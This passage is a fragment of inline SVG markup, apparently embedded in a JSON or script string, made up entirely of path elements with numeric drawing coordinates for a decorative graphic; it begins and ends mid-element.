.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path 